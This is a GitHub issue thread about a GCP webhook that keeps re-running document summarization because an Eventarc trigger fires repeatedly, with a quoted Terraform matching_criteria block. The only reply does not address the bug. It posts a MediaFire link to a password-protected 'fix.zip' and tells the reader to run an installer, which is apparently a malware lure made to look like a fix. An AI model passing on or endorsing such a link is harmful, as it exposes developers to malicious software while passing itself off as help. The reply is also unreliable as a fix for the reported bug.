### ISSUE TITLE
Webhook Infinite Loop

### ISSUE THREAD

**Issue by mrhillsman** [opdev/terraform-genai-doc-summarization#2]
The [main](https://github.com/opdev/terraform-genai-doc-summarization/blob/main/webhook/main.py) file which runs the inference for both OCR to extract text and summarization does not stop after completing summarization; it will continue to see the uploaded PDF and try to summarize it again and again.

It is my understanding that the [main](https://github.com/opdev/terraform-genai-doc-summarization/blob/main/main.tf) terraform eventarc resource's matching criteria would eliminate this:

```shell
  matching_criteria {
    attribute = "type"
    value     = "google.cloud.storage.object.v1.finalized"
  }
```

However the webhook is constantly being triggered causing the summarization to happen infinitely regardless of it being successful or not.

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
